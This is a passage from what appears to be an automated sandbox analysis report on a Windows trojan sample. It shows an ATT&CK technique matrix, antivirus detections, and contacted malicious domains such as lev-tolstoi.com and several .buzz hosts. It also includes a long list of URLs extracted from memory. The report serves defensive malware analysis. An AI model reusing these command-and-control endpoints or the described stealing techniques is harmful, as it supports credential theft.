                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                    Obfuscated Files or Information                    		NTDS1
                    File and Directory Discovery                    		Distributed Component Object Model2
                    Clipboard Data                    		114
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
                    Software Packing                    		LSA Secrets22
                    System Information Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    5Z19n7XRT1.exe55%ReversingLabsWin32.Trojan.AceCrypter
                    5Z19n7XRT1.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://scentniej.buzz/IP100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/api1Wu100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/KP100%Avira URL Cloudmalware
                    https://scentniej.buzz/100%Avira URL Cloudmalware
                    https://rebuildeso.buzz/100%Avira URL Cloudmalware
                    https://screwamusresz.buzz/api3100%Avira URL Cloudmalware
                    https://lev-tolstoi.com/.co.jp100%Avira URL Cloudmalware
                    https://scentniej.buzz/api100%Avira URL Cloudmalware

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    steamcommunity.com
                    		23.55.153.106
                    		truefalse
                      		high
                      lev-tolstoi.com
                      		104.21.66.86
                      		truefalse
                        		high
                        cashfuzysao.buzz
                        		unknown
                        		unknownfalse
                          		high
                          scentniej.buzz
                          		unknown
                          		unknownfalse
                            		high
                            inherineau.buzz
                            		unknown
                            		unknownfalse
                              		high
                              prisonyfork.buzz
                              		unknown
                              		unknownfalse
                                		high
                                rebuildeso.buzz
                                		unknown
                                		unknownfalse
                                  		high
                                  appliacnesot.buzz
                                  		unknown
                                  		unknownfalse
                                    		high
                                    hummskitnj.buzz
                                    		unknown
                                    		unknownfalse
                                      		high
                                      screwamusresz.buzz
                                      		unknown
                                      		unknownfalse
                                        		high

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        scentniej.buzzfalse
                                          		high
                                          https://steamcommunity.com/profiles/76561199724331900false
                                            		high
                                            rebuildeso.buzzfalse
                                              		high
                                              appliacnesot.buzzfalse
                                                		high
                                                screwamusresz.buzzfalse
                                                  		high
                                                  cashfuzysao.buzzfalse
                                                    		high
                                                    inherineau.buzzfalse
                                                      		high
                                                      https://lev-tolstoi.com/apifalse
                                                        		high
                                                        hummskitnj.buzzfalse
                                                          		high

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/chrome_newtab5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://player.vimeo.com5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/ac/?q=5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://steamcommunity.com/?subsection=broadcasts5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://store.steampowered.com/subscriber_agreement/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.gstatic.cn/recaptcha/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.valvesoftware.com/legal.htm5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.youtube.com5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.google.com5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af65Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2200239733.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://s.ytimg.com;5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=15Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2200239733.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://steam.tv/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://lev-tolstoi.com/KP5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://lev-tolstoi.com/5Z19n7XRT1.exe, 00000000.00000002.2390650962.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://store.steampowered.com/privacy_agreement/5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://store.steampowered.com/points/shop/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl05Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://scentniej.buzz/5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167343314.0000000000934000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      		unknown
                                                                                                                      http://ocsp.rootca1.amazontrust.com0:5Z19n7XRT1.exe, 00000000.00000003.2292863333.0000000003063000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://steamcommunity.com/profiles/76561199724331900JW5Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000002.2390650962.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://sketchfab.com5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.ecosia.org/newtab/5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://lv.queniujq.cn5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.youtube.com/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://store.steampowered.com/privacy_agreement/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.google.com/recaptcha/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://checkout.steampowered.com/5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://rebuildeso.buzz/5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                  		unknown
                                                                                                                                                  https://store.steampowered.com/;5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/about/5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://steamcommunity.com/my/wishlist/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://lev-tolstoi.com/api1Wu5Z19n7XRT1.exe, 00000000.00000003.2221183170.000000000094D000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221455502.000000000095A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        		unknown
                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://help.steampowered.com/en/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://steamcommunity.com/market/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://store.steampowered.com/news/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://screwamusresz.buzz/api35Z19n7XRT1.exe, 00000000.00000003.2221183170.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199960919.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                		unknown
                                                                                                                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://scentniej.buzz/IP5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://store.steampowered.com/subscriber_agreement/5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2245459003.000000000303D000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://recaptcha.net/recaptcha/;5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://scentniej.buzz/api5Z19n7XRT1.exe, 00000000.00000003.2167365798.000000000091F000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167365798.0000000000906000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2167452734.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://steamcommunity.com/discussions/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://store.steampowered.com/stats/5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://medal.tv5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://broadcast.st.dl.eccdnx.com5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
